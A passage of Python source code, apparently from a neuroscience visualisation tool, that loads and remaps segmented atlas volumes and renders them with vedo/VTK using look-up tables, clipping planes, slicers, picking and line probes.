def load_volume(self, file_path, remap_scalars=False, mapping=None, make_current=True):
"""
Load a volume data file. Supports NRRD and many other formats thanks to vedo/VTK
:param file_path: Volume file path. Could support other file types easily.
:param remap_scalars: Whether scalar values in the volume are replaced by
their row id from a mapping that stores. This is necessary in the case of segmented
volumes with regions that have a discontinuous id.
:param mapping: Pandas Series or a Dictionary
:param make_current: Set the volume data as the current one
:return: 3D array
"""
data = None
if not remap_scalars or mapping is None:
data = self.import_volume(file_path)
else:
time = datetime.now()
new_file_path = utils.change_file_name(file_path, None, None, VolumeModel.NORMALIZED_SUFFIX)
if os.path.exists(new_file_path):
data = self.import_volume(new_file_path)
else:
data = self.import_volume(file_path)
data, mapping = self.remap_slow(data, mapping, new_file_path)
logging.info('Remapped scalar values in: ' + str(utils.time_diff(time)) + 's')
'''
if volume is not None:
logging.info('Opened atlas ' + new_file_path + ' in ' + str(utils.time_diff(time)) + 's')
min_value, max_value = np.amin(data), np.amax(data)
logging.info('Min max scalar values in volume ' + str(min_value) + ' -> ' + str(max_value))
else:
logging.error('Failed to open atlas ' + new_file_path)
'''
if make_current and data is not None:
self.data = data
return data, mapping
def transpose(self, shape=None):
"""
Transpose the volume for visualization in VTK
:param shape: The new shape. If None, will default to self.transpose_shape
"""
if shape is None:
shape = self.transpose_shape
if shape is None:
return
self.data = np.transpose(self.data, shape)
def remap_slow(self, data, mapping=None, write_path=None):
"""
Reassign volume values (slow on large volumes!) so that they're continuous
:param data: Volume ndarray
:param write_path: Where the modified volume will be stored
(to spare going through this method next time)
:param mapping: Pandas Series or a Dictionary that maps raw volume scalars to new ones
:return: Modified volume data
"""
logging.info('\nBuilding appropriate volume from Allen data source...')
#volume = np.vectorize(self.f)(data)
labels = np.sort(np.unique(data))
num_labels = len(labels)
if mapping is None:
mapping = pd.Series(labels)
logging.info('Num regions labeled in volume ' + str(num_labels) + ' from ' + str(mapping.size) + ' in atlas')
logging.info('Reassigning ' + str(num_labels) + ' scalar values...')
for iter_id in range(num_labels):
label = labels[iter_id]
ids = mapping.index[mapping == label].to_list()
if len(ids) < 1:
continue
# On a large volume, this takes a long time
data[data == label] = ids[0]
if num_labels > 10000 and iter_id % 10 == 0:
logging.info(' Progress: ' + str(int(iter_id/num_labels)*100) + '%')
if write_path is not None:
logging.info('Saving volume data under ' + write_path)
nrrd.write(write_path, data, index_order='C')
return data, mapping
def build_lut(self, scalar_map=None, scalar_range=None, color_map=None,
alpha_map=None, zero_is_transparent=True,
noise_amount=0.0, nan_rgba=None, make_active=True):
"""
Build a look-up table (LUT, sometimes known as transfer function) for the volume
:param scalar_map: A 2D list with values in first column from the volume itself and values from
the second column being your scalar values that correspond to such region
:param scalar_range: Min and max values in a list
:param color_map: Color map name to apply
:param alpha_map: Alpha map, either None or a list of values the same length as scalar_map, that
says how transparent a scalar value should be
:param zero_is_transparent: Whether zero values are made transparent, True by default
:param noise_amount: Whether a noise value is applied on the colors
:param nan_rgba: Color and transparency (RGBA) to assign to invalid (out of range or None) scalar values
:param make_active: Whether this one is made active (you still have to update the views after that)
:return: LUTModel
"""
lut_model = LUTModel()
lut_model.build(scalar_map, scalar_range, color_map, alpha_map,
zero_is_transparent, noise_amount, nan_rgba)
self.luts.store(lut_model, set_current=make_active)
return lut_model
def blend_maps(map1, map2, time, total_time):
"""
Blend color maps
"""
weight1 = max(0.0, total_time - time)
weight2 = max(0.0, time)
return map1 * weight1 + map2 * weight2
class Volume(vedo.Volume):
"""
Overwriting of vedo.Volume constructor that is ill-designed as
it transposes the given numpy array without us knowing about it,
not giving us the option to choose about that.
"""
def __init__(self,
inputobj=None,
c='RdBu_r',
alpha=(0.0, 0.0, 0.2, 0.4, 0.8, 1.0),
alphaGradient=None,
alphaUnit=1,
mode=0,
shade=False,
spacing=None,
dims=None,
origin=None,
mapper='smart'):
vtk.vtkVolume.__init__(self)
vedo.BaseGrid.__init__(self)
self.axes = [1, 1, 1]
###################
if isinstance(inputobj, str):
if "https://" in inputobj:
from vedo.io import download
inputobj = download(inputobj, verbose=False) # fpath
elif os.path.isfile(inputobj):
pass
else:
inputobj = sorted(glob.glob(inputobj))
###################
if 'gpu' in mapper:
self._mapper = vtk.vtkGPUVolumeRayCastMapper()
elif 'opengl_gpu' in mapper:
self._mapper = vtk.vtkOpenGLGPUVolumeRayCastMapper()
elif 'smart' in mapper:
self._mapper = vtk.vtkSmartVolumeMapper()
elif 'fixed' in mapper:
self._mapper = vtk.vtkFixedPointVolumeRayCastMapper()
elif isinstance(mapper, vtk.vtkMapper):
self._mapper = mapper
else:
print("Error unknown mapper type", [mapper])
raise RuntimeError()
self.SetMapper(self._mapper)
###################
inputtype = str(type(inputobj))
#colors.printc('Volume inputtype', inputtype)
if inputobj is None:
img = vtk.vtkImageData()
elif vedo.utils.isSequence(inputobj):
if isinstance(inputobj[0], str): # scan sequence of BMP files
ima = vtk.vtkImageAppend()
ima.SetAppendAxis(2)
pb = vedo.utils.ProgressBar(0, len(inputobj))
for i in pb.range():
f = inputobj[i]
picr = vtk.vtkBMPReader()
picr.SetFileName(f)
picr.Update()
mgf = vtk.vtkImageMagnitude()
mgf.SetInputData(picr.GetOutput())
mgf.Update()
ima.AddInputData(mgf.GetOutput())
pb.print('loading...')
ima.Update()
img = ima.GetOutput()
else:
if "ndarray" not in inputtype:
inputobj = np.array(inputobj)
if len(inputobj.shape)==1:
varr = vedo.numpy2vtk(inputobj, dtype=np.float)
else:
# ------------------------------ Nasty lines commented here
#if len(inputobj.shape)>2:
#inputobj = np.transpose(inputobj, axes=[2, 1, 0])
varr = vedo.numpy2vtk(inputobj.ravel(order='F'), dtype=np.float)
varr.SetName('input_scalars')
img = vtk.vtkImageData()
if dims is not None:
img.SetDimensions(dims)
else:
if len(inputobj.shape)==1:
vedo.colors.printc("Error: must set dimensions (dims keyword) in Volume.", c='r')
raise RuntimeError()
img.SetDimensions(inputobj.shape)
img.GetPointData().SetScalars(varr)
#to convert rgb to numpy
# img_scalar = data.GetPointData().GetScalars()
# dims = data.GetDimensions()
# n_comp = img_scalar.GetNumberOfComponents()
# temp = utils.vtk2numpy(img_scalar)
# numpy_data = temp.reshape(dims[1],dims[0],n_comp)
# numpy_data = numpy_data.transpose(0,1,2)
# numpy_data = np.flipud(numpy_data)
elif "ImageData" in inputtype:
img = inputobj
elif isinstance(inputobj, vedo.Volume):
img = inputobj.GetMapper().GetInput()
elif "UniformGrid" in inputtype:
img = inputobj
elif hasattr(inputobj, "GetOutput"): # passing vtk object, try extract imagdedata
if hasattr(inputobj, "Update"):
inputobj.Update()
img = inputobj.GetOutput()
elif isinstance(inputobj, str):
from vedo.io import loadImageData, download
if "https://" in inputobj:
inputobj = download(inputobj, verbose=False)
img = loadImageData(inputobj)
else:
vedo.colors.printc("Volume(): cannot understand input type:\n", inputtype, c='r')
return
if dims is not None:
img.SetDimensions(dims)
if origin is not None:
img.SetOrigin(origin) ### DIFFERENT from volume.origin()!
if spacing is not None:
img.SetSpacing(spacing)
self._data = img
self._mapper.SetInputData(img)
self.mode(mode).color(c).alpha(alpha).alphaGradient(alphaGradient)
self.GetProperty().SetShade(True)
self.GetProperty().SetInterpolationType(1)
self.GetProperty().SetScalarOpacityUnitDistance(alphaUnit)
# remember stuff:
self._mode = mode
self._color = c
self._alpha = alpha
self._alphaGrad = alphaGradient
self._alphaUnit = alphaUnit
@dataclass
class LUTModel:
"""
This class might look slightly convoluted but it's actually simple.
We use double mapping here in order to enable live/interactive visualization
of volumetric data. Instead of replacing values in a 3D volume, we only replace
the colors in the 1D LUT list.
The point is that it's too slow to update a given data, like a segmented
volume with custom values. Instead, we map such custom values to a 1D
array (our LUT) that maps colors to raw volume values.
This is much faster in terms of rendering and it enables interactive visualization.
The scalar_lut is the original LUT for the given scalars (custom values)
and the mapped_lut is the LUT assigned to the surfaces (like slices)
that have copied data from the volume. The volume is given color_map
and alpha_map through vedo methods.
You might say "ok for double mapping, it's the only way for interactive
rendering of a volume, but what about color_map and mapped_lut? Aren't
they the same?". The answer is: they're the same but VTK does not accept
a vtkLookupTable for a volume. Instead, it wants a vtkColorTransferFunction
and a vtkPiecewiseFunction for alpha. There's no way around it.
The color_map will be computed as a vtkColorTransferFunction and
the alpha_map as the vtkPiecewiseFunction.
"""
name: str = NotImplementedError
color_map_function: Any = None
scalar_map: np.ndarray = None
scalar_min: float = 0.0
scalar_max: float = 1.0
scalar_lut: vtk.vtkLookupTable = None
mapped_lut: vtk.vtkLookupTable = None
color_map: np.ndarray = None
alpha_map: np.ndarray = None
base_color_map: np.ndarray = None
def build(self, scalar_map=None, scalar_range=None, color_map=None,
alpha_map=None, zero_is_transparent=True,
noise_amount=0.0, nan_rgba=None):
"""
Build several look-up tables (LUT, sometimes known as transfer function) for the volume.
This is where double-mapping occurs for segmented volumes that have values from 0 to n where
each value defines a sub-volume or region. If we want to assign values (say from another model)
to these regions, we'd have to change the volume values and it would be too slow iterating over
each voxel in 3D. Instead we define colors that represent these values and assign them to
segmented regions in a 1D list.
:param scalar_map: A 2D list with values in first column from the volume itself and values from
the second column being your scalar values that correspond to such region
:param scalar_range: Min and max values in a list
:param color_map: Color map name to apply
:param alpha_map: Alpha map, either None or a list of values the same length as scalar_map, that
says how transparent a scalar value should be
:param zero_is_transparent: Whether zero values are made transparent, True by default
:param noise_amount: Whether a noise value is applied on the colors
:param nan_rgba: Color and alpha values to assign to invalid (out of range or None) scalar values
:return: LUTModel
"""
if color_map is None:
return
if nan_rgba is None:
nan_rgba = [0.0, 0.0, 0.0, 0.0]
if self.base_color_map is None:
self.base_color_map = color_map
colors = []
alphas = []
lut = vtk.vtkLookupTable()
scalar_lut = vtk.vtkLookupTable()
# Use the number of values in the volume
num_steps = len(self.base_color_map) if self.base_color_map is not None else len(color_map)
num_steps = 2655
s_min = 0
s_max = num_steps
if scalar_map is None:
if color_map is None and self.base_color_map is not None:
color_map = self.base_color_map
loop = range(num_steps)
noise = None
if isinstance(noise_amount, float) and noise_amount > 0:
noise = np.random.rand(num_steps) * noise_amount - noise_amount / 2
# Vedo works with nested lists:
# [region_id, [r, g, b]] for color, and [region_id, a] for alpha
if scalar_map is None:
# Standard volume that is not segmented
lut.SetRange(s_min, s_max)
lut.SetNumberOfTableValues(num_steps)
scalar_lut.SetRange(s_min, s_max)
scalar_lut.SetNumberOfTableValues(num_steps)
for r_id in loop:
color = vedo.colors.getColor(color_map[r_id])
color = np.array(color)
if noise is not None:
color = color + noise[r_id]
color = np.maximum(color, 0.0)
color = np.minimum(color, 1.0)
colors.append([r_id, color])
alpha = 1.0 if alpha_map is None else alpha_map[r_id]
if r_id == 0 and zero_is_transparent:
alpha = 0.0
alphas.append([r_id, alpha])
lut.SetTableValue(r_id, *color, alpha)
scalar_lut.SetTableValue(r_id, *color, alpha)
#scalar_map[r_id] = color_map[r_id]
else:
# Segmented volume
s_min, s_max = scalar_range
lut.SetRange(0, num_steps)
lut.SetNumberOfTableValues(num_steps)
color = None
for r_id in range(num_steps):
try:
value = scalar_map[r_id]
except Exception:
value = None
if value is None:# or s_min > value or s_max < value:
color = nan_rgba[:3]
alpha = nan_rgba[3]
else:
color = vedo.colorMap(value, color_map, s_min, s_max)
alpha = 1.0 if alpha_map is None else alpha_map[r_id]
if value == 0 and zero_is_transparent:
alpha = 0.0
colors.append([r_id, color])
alphas.append([r_id, alpha])
lut.SetTableValue(r_id, *color, alpha)
# Real scalar LUT, mainly as a reference for the user
# Here the colors resulting from the given scalar min to max
# are assigned to segmented values in the volume
mock_values = np.linspace(s_min, s_max, num_steps)
scalar_lut.SetRange(s_min, s_max)
scalar_lut.SetNumberOfTableValues(len(mock_values))
for r_id in range(len(mock_values)):
color = list(vedo.colorMap(mock_values[r_id], color_map, s_min, s_max))
alpha = 0.0 if mock_values[r_id] == 0 and zero_is_transparent else 1.0
scalar_lut.SetTableValue(r_id, *color, 1.0)
lut.Build()
scalar_lut.Build()
# Just to avoid confusion: the user can give a string as a color map, like 'viridis'
# but the real color map object is stored in self.color_map. The name 'viridis'
# is stored under self.color_map_function (if needed later on)
self.color_map_function = color_map
self.color_map = colors
self.alpha_map = alphas
self.scalar_map = scalar_map
self.mapped_lut = lut
self.scalar_lut = scalar_lut
def get_sorted_scalars(self):
"""
Get a numpy 2D array of key-value pairs sorted by value
:return: 2D array
"""
sorted_scalars = np.zeros((len(self.scalar_map), 2))
values = list(self.scalar_map.values())
keys = list(self.scalar_map.keys())
sorted_scalars[:, 0] = keys
sorted_scalars[:, 1] = values
sorted_mask = sorted_scalars[:, 1].argsort()
sorted_scalars = sorted_scalars[sorted_mask]
return sorted_scalars
class VolumeController():
"""
Wrapper class that handles both the volume and its slices
"""
def __init__(self, plot, model, initialize=True, clipping=True, slicer_box=True,
center_on_edges=False, alpha_unit_upper_offset=0.0, add_to_scene=True):
"""
Constructor
:param plot: Plot instance
:param model: VolumeModel instance
:param initialize: Whether the initalization
:param clipping: Whether clipping is enabled at init time
:param slicer_box: Whether the slicer box is enabled at init
:param center_on_edges: Whether the volume is offest by half a voxel or not
:param alpha_unit_upper_offset: The offset to apply to alpha unit computation.
If greater than 0, the volume will be less opaque
:param add_to_scene: Whether the volume is added to scene after init
"""
self.plot = plot
self.model = model
self.actor = None
self.picker = None
self.scalars = None
self.mask = None
self.bounding_mesh = None
self.alpha_unit_upper_offset = alpha_unit_upper_offset
self.alpha_factor = 0.001 # * self.model.resolution
self.clipping_planes = None
self.enable_volume_clipping = True
self.clipping_axes = []
self.slicers = OrderedDict()
self.slicers_selectable = False
self.scalar_bar = None
if initialize:
self.initialize(clipping, slicer_box, center_on_edges, add_to_scene)
#msg = 'Volume abs center', self.volume_center, 'position', np.array(self.volume_actor.pos())
#logging.info(msg)
def get_related_actors(self):
"""
Get all 3D actors related to this view (for registering it in the application)
:return: List of VTK objects
"""
actors = []
for slicer_id in self.slicers:
actor = self.slicers[slicer_id].actor
if actor is not None:
actors.append(actor)
for iso_id in self.model.isosurfaces:
actors.append(self.model.isosurfaces[iso_id])
actors.append(self.actor)
return actors
def initialize(self, clipping=True, slicer_box=True, center_on_edges=False, add_to_scene=True):
"""
Set the volume actor for visualization in VTK
:param clipping: Whether clipping is enabled
:param slicer_box: Whether the slicer box mode is enabled (6 clipping planes)
:param center_on_edges: Whether the volume's center is aligned to its edges
rather than the voxel center
:param add_to_scene: Whether the object is added to the scene
"""
self.build_actor(center_on_edges, add_to_scene)
self.initialize_picker()
if slicer_box:
self.initialize_slicer_box()
self.initialize_clipping_planes()
self.set_volume_clipping(clipping)
self.set_color_map()
'''
if use_mask:
self.mask = self.actor.clone()
self.mask.threshold(1, replace=1, replaceOut=0)
self.actor.mapper().SetMaskTypeToBinary()
self.actor.mapper().SetMaskInput(self.mask)
'''
def set_volume_visibility(self, on=True):
"""
Set volume visibility
:param on: Visibility boolean
"""
if self.actor is not None:
self.actor.SetVisibility(on)
def set_slices_visibility(self, on=True):
"""
Set the visibility of slices
:param on: Visibility boolean
"""
for slicer_id in self.slicers:
slicer_view = self.slicers.get(slicer_id)
slicer_view.actor.SetVisibility(on)
def get_slices_opacity(self):
"""
Get the opacity of slices (should be the same value for all slices)
A mean calculation is performed on all slices alpha, just in case
:return: Alpha value
"""
value = 0
num_values = 0
for slicer_id in self.slicers:
slicer = self.slicers[slicer_id]
if slicer.actor is not None:
slice_alpha = slicer.actor.GetProperty().GetOpacity()
if slice_alpha is None:
continue
value += slice_alpha
num_values += 1
if num_values == 0 or value == 0:
return None
return value / num_values
def set_slices_opacity(self, value):
"""
Set the opacity of slices
:param value: Alpha value
"""
for slicer_id in self.slicers:
slicer = self.slicers[slicer_id]
if slicer.actor is not None:
slicer.actor.alpha(value)
def get_opacity(self):
"""
Get the relative opacity unit
:return: Float
"""
return self.get_relative_opacity_unit()
def get_relative_opacity_unit(self):
"""
Get the alpha unit relative value
:return: Float
"""
alpha_unit = self.actor.alphaUnit()
r = self.model.resolution
# Inverse function of set_opacity_unit()
value = 1.1 - (alpha_unit / r)**0.5
return value
def set_opacity(self, value):
"""
Set the opacity of the volume like in set_opacity_unit()
:param value: Opacity value between 0.0 and 1.0
:return: Resulting alpha unit
"""
self.set_opacity_unit(value)
def set_opacity_unit(self, value):
"""
Set the opacity of the volume by modifying its alpha unit (a VTK thing).
The alpha unit defines how much a voxel is transparent to incoming ray.
This method normalizes the range between 0.0 and 1.0 as it depends
on the resolution of the volume
:param value: Opacity value between 0.0 and 1.0
:return: Resulting alpha unit
"""
r = self.model.resolution
# 1 is chosen and not 1.0 because when value == 1.0, that would
# mean that the volume is fully opaque and this yields artifacts with VTK
alpha_unit = (1 + self.alpha_unit_upper_offset - value)**2 * r
# vedo calls it "alpha" unit, vtk "opacity" unit. same-same!
self.actor.alphaUnit(alpha_unit)
return alpha_unit
def get_spacing(self):
"""
Get the spacing/resolution of the volume
"""
res = self.model.resolution
spacing = None
if isinstance(res, int) or isinstance(res, float):
spacing = np.array([res]*3)
elif len(res) == 3:
spacing = res
else:
raise ValueError(f'Given volume resolution {self.model.resolution} is invalid')
return spacing
def build_actor(self, center_on_edges=False, add_to_scene=True): #[1, 2]
"""
Set the volume actor for visualization in VTK
:param center_on_edges: Whether alignment by one voxel is applied
:param add_to_scene: Whether the object is added to the scene
"""
spacing = self.get_spacing()
self.actor = Volume(self.model.data, spacing=spacing, mapper='smart')
self.scalars = self.actor._data.GetPointData().GetScalars()
self.actor.name = self.model.name
self.actor.shade(False)
self.actor.mode(0)
self.actor.pickable(True)
self.set_interactive_subsampling(False)
if center_on_edges:
# Moving the volume by one voxel. This is possibly due the use of custom spacing.
self.actor.pos(self.actor.pos() + spacing)
center = np.array(self.actor.pos()) + self.actor.center()
if np.linalg.norm(center - self.model.center) > 0:
#print('Adjusting volume center from', self.model.center, 'to', center)
self.model.center = center
self.set_opacity_unit(0.9)
self.actor.jittering(True)
#self.actor._mapper.AutoAdjustSampleDistancesOn()
#self.actor._mapper.SetBlendModeToAverageIntensity()
#self.actor._mapper.SetSampleDistance(100)
if add_to_scene:
self.plot.add(self.actor, render=False)
def set_position(self, position):
"""
Set the position of the volume
"""
self.actor.pos(position)
# TODO: we're entering in unstable things when we move the volume
# because there is not yet a guaranteed support for updating the slices
# with the correct position
self.reset_clipping_planes()
def mirror_volume(self, axes):
"""
Mirror the volume on given axes
:param mirror_axes: A list of axes (either 0, 1, 2 or 'x', 'y', 'z') on which
the volume will be mirrored. Optional
"""
if axes is None or self.actor is None:
return
axes_str = ['x', 'y', 'z']
for axis in axes:
if isinstance(axis, int) and 0 <= axis <= 2:
axis = axes_str[axis]
if isinstance(axis, str) and len(axis) == 1:
self.actor.mirror(axis=axis.lower())
def initialize_picker(self, opacity_iso_value=0.0001):
"""
Initialize the volume picker
:param opacity_iso_value: Threshold that defines at what accumulated
opacity the picker hits the volume. In the case of a segmented volume,
you want to keep this value very low as the default one.
"""
# As per C++ doc https://vtk.org/Wiki/VTK/Examples/Cxx/VTKConcepts/Scalars
# https://stackoverflow.com/questions/35378796/vtk-value-at-x-y-z-point
picker = vtk.vtkVolumePicker()
picker.PickCroppingPlanesOn()
picker.UseVolumeGradientOpacityOff()
picker.SetTolerance(opacity_iso_value)
# A low OpacityIsoValue is necessary in the case of segmented volumes
picker.SetVolumeOpacityIsovalue(opacity_iso_value)
picker.AddPickList(self.actor)
picker.PickFromListOn()
self.picker = picker
def initialize_slicer_box(self):
"""
Initialize 6 slicing planes as a box.
"""
for axis_id in range(6):
slicer_model = SlicerModel(axis=axis_id)
slicer_model.align_to_axis(axis_id, self.model.dimensions)
self.model.slicers.store(slicer_model)
# It's important in this case to have standalone=False
self.slicers[axis_id] = SlicerView(self.plot, self, slicer_model, standalone=False)
def update_slicer(self, slicer_id, value=None, normal=None):
"""
Update a given slicer with the given value
:param slicer_id: SlicerView id
:param value: Value or 3D point
:param normal: Normal
"""
slicer_view = self.slicers.get(slicer_id)
if slicer_view is None:
return
# This is an important part where the slicing plane is itself sliced by other planes
slicer_model = slicer_view.model
slicer_model.clipping_planes = self.get_clipping_planes(slicer_model.axis)
# Use given value (or point) and normal to guide the below code
result = slicer_model.update(value, normal)
if not result:
return
# Update slicing image
slicer_view.update()
def initialize_clipping_planes(self):
"""
Initialize X, Y and Z clipping planes with two planes per axis
for positive and negative slicing
"""
self.clipping_planes = vtk.vtkPlaneCollection()
slicer_models = self.model.slicers
for slicer_id in slicer_models:
self.clipping_planes.AddItem(vtk.vtkPlane())
self.reset_clipping_planes()
return
def get_clipping_planes(self, except_axis=None):
"""
Get the current clipping planes except the ones on the given axis
:param except_axis: Axis id to ignore. If None, all clipping planes will be returned
:return: vtkPlaneCollection
"""
if not isinstance(except_axis, int):
return self.clipping_planes
exceptions = [except_axis * 2, except_axis * 2 + 1]
planes = vtk.vtkPlaneCollection()
for plane_id in range(self.clipping_planes.GetNumberOfItems()):
if plane_id in exceptions:
continue
plane = self.clipping_planes.GetItem(plane_id)
planes.AddItem(plane)
return planes
def reset_clipping_planes(self):
"""
Reset clipping planes
"""
slicer_models = self.model.slicers
for slicer_id in slicer_models:
slicer_model = slicer_models[slicer_id]
plane_id = slicer_model.get_box_plane_id()
plane = self.clipping_planes.GetItem(plane_id)
plane.SetOrigin(slicer_model.origin + self.actor.pos())
plane.SetNormal(slicer_model.normal)
def clip_on_axis(self, position=None, axis=None, normal=None):
"""
Apply clipping on a single axis
:param position: Position
:param axis: Clipping axis, defaults to 0 (X axis)
:param thickness: Whether a thickness (so two clipping planes) are applied
"""
axis_offset = 0
# This should already be sorted in the model but in case it isn't, we double check here
if normal is not None and normal[axis] < 0:
# This means that the given axis has two
# clipping planes and we take the negative one
axis_offset += 1
#position = self.model.dimensions - position
axis_storage_id = axis * 2 + axis_offset
plane = self.clipping_planes.GetItem(axis_storage_id)
plane.SetOrigin(position)
plane.SetNormal(normal)
def set_volume_clipping(self, on=None):
"""
Set volume clipping on or off.
:param on: Whether clipping is enabled or disabled. If None, then
the state is toggled.
"""
if on is None:
self.enable_volume_clipping = not self.enable_volume_clipping
else:
self.enable_volume_clipping = on
if self.enable_volume_clipping:
self.actor.mapper().SetClippingPlanes(self.clipping_planes)
else:
self.actor.mapper().SetClippingPlanes(None)
def clip_to_bounds(self, bounds):
"""
Clip the volume and move the slicing planes according to 6 boundary points
:param bounds: Six values in a list (xmin, xmax, ymin, ymax, zmin, zmax)
"""
planes = vtk.vtkPlanes()
planes.SetBounds(bounds)
# Normals are reversed with the above code
# so we fix that here with flip_normals=True
self.set_clipping_planes(planes, flip_normals=True)
def box_widget_update(self, widget=None, event=None):
"""
Clip the volume with the current box widget
:param widget: vtkBoxCutter
:param event: vtkEvent
"""
if widget is None:
return
planes = vtk.vtkPlanes()
widget.GetPlanes(planes)
self.set_clipping_planes(planes)
def set_clipping_planes(self, planes, flip_normals=False):
"""
Clip the volume and move the slicing planes according the given planes
:param planes: vtkPlanes
"""
vtk_n = planes.GetNormals()
vtk_pts = planes.GetPoints()
num_pts = vtk_pts.GetNumberOfPoints()
for plane_id in range(num_pts):
normal = vtk_n.GetTuple(plane_id)
origin = vtk_pts.GetPoint(plane_id)
plane = self.clipping_planes.GetItem(plane_id)
current_origin = np.array(plane.GetOrigin())
# We don't need to check the normal because
# we prevent box cutter rotation in our case
if np.linalg.norm(current_origin - origin) < 0.1:
continue
plane.SetOrigin(origin)
if flip_normals:
normal = np.array(normal)*-1
plane.SetNormal(normal)
self.update_slicer(plane_id, origin, normal)
self.clipping_planes.Modified()
self.actor.GetMapper().Update()
def set_alpha_map(self, alpha_map, alpha_factor=None):
"""
Set alpha map to the volume view
:param alpha_map: 2D list of scalar values and alpha values
:param alpha_factor: Alpha factor
"""
if alpha_map is None:
if self.model.luts.current is None:
return
alpha_map = self.model.luts.current.alpha_map
if alpha_factor is None:
alpha_factor = self.alpha_factor
if len(np.array(alpha_map).shape) > 1:
volume_alpha_map = np.ones_like(alpha_map).astype(float)
volume_alpha_map[:] = alpha_map[:]
volume_alpha_map[:, 1] *= alpha_factor
self.actor.alpha(volume_alpha_map)
else:
self.actor.alpha(np.array(alpha_map) * alpha_factor)
def set_color_map(self, color_map=None, alpha_map=None):
"""
Set the color and alpha map to the view objects
:param color_map: Nested list of scalar values and rgb colors
like [[0, [0.0, 0.0, 0.0]], [8, [0.5, 0.8, 0.3]], ...]
:param alpha_map: 2D list of scalar values and alpha values
"""
lut = self.model.luts.current
if color_map is None and lut is not None:
color_map = lut.color_map
if alpha_map is None and lut is not None:
alpha_map = lut.alpha_map
if color_map is None:
return
self.actor.cmap(color_map)
self.set_alpha_map(alpha_map)
if lut is not None:
for surface in self.model.isosurfaces:
surface._mapper.SetLookupTable(lut.opaque_lut)
for slicer_id in self.slicers:
slicer = self.slicers[slicer_id]
slicer.apply_lut(lut.mapped_lut)
else:
for slicer_id in self.slicers:
slicer = self.slicers[slicer_id]
slicer.set_color_map(color_map, alpha_map)
def disable_shading(self):
"""
Disable volume shading
"""
volumeProperty = self.actor.GetProperty()
volumeProperty.ShadeOff()
self.actor.SetProperty(volumeProperty)
def enable_shading(self, ambient=0.6, diffuse=0.8, specular=0.9):
"""
Enable volume shading
TODO: See if this method is useful
"""
volumeProperty = self.actor.GetProperty()
volumeProperty.SetInterpolationTypeToLinear()
volumeProperty.ShadeOn()
volumeProperty.SetAmbient(ambient)
volumeProperty.SetDiffuse(diffuse)
volumeProperty.SetSpecular(specular)
volumeProperty.SetScalarOpacityUnitDistance(1)
self.actor.SetProperty(volumeProperty)
def toggle_slices_visibility(self):
"""
Toggle slices visibility
"""
self.model.slices_visible = not self.model.slices_visible
for slicer_id in self.slicers:
slicer = self.slicers[slicer_id]
self.update_slicer(slicer)
if slicer.actor is not None:
slicer.actor.SetVisibility(self.model.slices_visible)
def toggle_hollow(self):
"""
Toggle hollow mode for volume rendering. This is intended
to work only on segmented (annotated) volumes.
"""
volume_property = self.actor.GetProperty()
# Shout at VTK devs: it's twisted to name properties Disable and then have DisableOff...
disabled = bool(volume_property.GetDisableGradientOpacity())
if disabled:
volume_property.DisableGradientOpacityOff()
alpha_gradient = vtk.vtkPiecewiseFunction()
alpha_gradient.AddPoint(0, 0.0)
alpha_gradient.AddPoint(1, 0.75)
alpha_gradient.AddPoint(2, 1.0)
volume_property.SetGradientOpacity(alpha_gradient)
else:
volume_property.DisableGradientOpacityOn()
return not disabled
def get_value_from_xyz(self, position, normal_step=None, avoid_values=0, cast_to_int=True, none_as_zero=False):
"""
Get a scalar value from the volume with respect to XYZ coordinates and a optionally a normal step,
that is the normal on which to probe multiplied by the distance you want to travel further into
the volume to pick a correct value. Often the "surface point" on a volume with non uniform transparency
is at the boundary between transparent (let's say a 0 value is transparent) and more opaque parts.
So you need to go further into the "cloud" so to speak, in order to find the values you want.
:param position: 3D array
:param normal_step: A vector normal multiplied by the lookup distance, in case the raw position yields
bad or unwanted results
:param avoid_values: Try and find other values than this
:param cast_to_int: Whether the value should be cast to integer
:return: Scalar value
"""
if isinstance(avoid_values, int) or isinstance(avoid_values, float):
avoid_values = [avoid_values]
# TODO: see if this is faster? To be tested
# ijk_result = [0.0, 0.0, 0.0]
# volume_actor._data.TransformPhysicalPointToContinuousIndex(xyz, ijk_result)
# volume_actor._data.GetPoint(ijk_result)
pt_id = self.actor._data.FindPoint(*position)
valid_id = 0 < pt_id < self.scalars.GetNumberOfValues()
value = self.scalars.GetValue(pt_id) if valid_id else None
if not valid_id or (value in avoid_values):
if normal_step is not None:
position += normal_step
pt_id = self.actor._data.FindPoint(*position)
valid_id = 0 < pt_id < self.scalars.GetNumberOfValues()
value = self.scalars.GetValue(pt_id) if valid_id else None
if cast_to_int and value is not None:
value = int(value)
if value is None and none_as_zero:
value = 0
return value
def raycast(self, origin, screen_position):
"""
Shorthand for pick() method
"""
return self.pick(origin, screen_position)
def pick(self, origin, screen_position):
"""
Find the nearest intersection – even on sliced volume – with the ray formed
by an origin and a screen-space position (given by VTK when you click on an actor)
:param origin: Origin of the vector
:param screen_position: 2D position on screen. This is given by vtk events like MouseRelease
:return: The nearest position and its related value queried in the volume image
"""
self.picker.Pick(*screen_position[:2], 0, self.plot.renderer)
position = np.array(self.picker.GetPickPosition())
ray = position - origin
distance = np.linalg.norm(ray)
normal = ray / distance
# Go half a voxel further to make sure we don't hit "void"
vol_position = position # + normal * self.model.resolution / 2
probe_position = position + normal * self.model.resolution * 10
closest_dist = distance
slice_position = None
# See if the line hits any of the slicers (that are image planes)
for slicer_id in self.slicers:
slicer = self.slicers[slicer_id]
if slicer.got_slice:
hits = slicer.actor.intersectWithLine(origin, probe_position)
if len(hits) != 1:
continue
new_dist = np.linalg.norm(position - hits[0])
if new_dist < closest_dist and new_dist < self.model.resolution * 2:
closest_dist = new_dist
slice_position = hits[0]
if slice_position is None:
position = vol_position
else:
position = slice_position
value = self.get_value_from_xyz(position, normal * self.model.resolution * 4)
return position, value
def add_probe(self, origin, destination, resolution=40, radius=10, color_map=None,
screen_space=True, min_v=None, max_v=None, add_to_scene=True):
"""
Add a series of points along a line probe
:param origin: Probe origin
:param destination: Probe destination point
:param resolution: Number of (equidistant) points that will be probed along that line
:param radius: Radius of the points
:param color_map: Scalars color map
:param screen_space: Whether the points are screen space or spheres
:param min_v: Min scalar value
:param max_v: Max scalar value
:param add_to_scene: Whether the new probe is added to scene
:return: Points
"""
if color_map is None:
color_map = self.model.luts.current.color_map
positions, values = self.probe(origin, destination, resolution)
points_obj = obj.Points(positions, values=values, radius=radius, screen_space=screen_space,
color_map=color_map, min_v=min_v, max_v=max_v)
points_obj.origin = origin
points_obj.destination = destination
# Dynamic properties assignment
points_obj.target = self.actor
points_obj.target_controller = self
if add_to_scene:
self.plot.add(points_obj)
return points_obj
def update_probe(self, origin, destination, points_obj):
"""
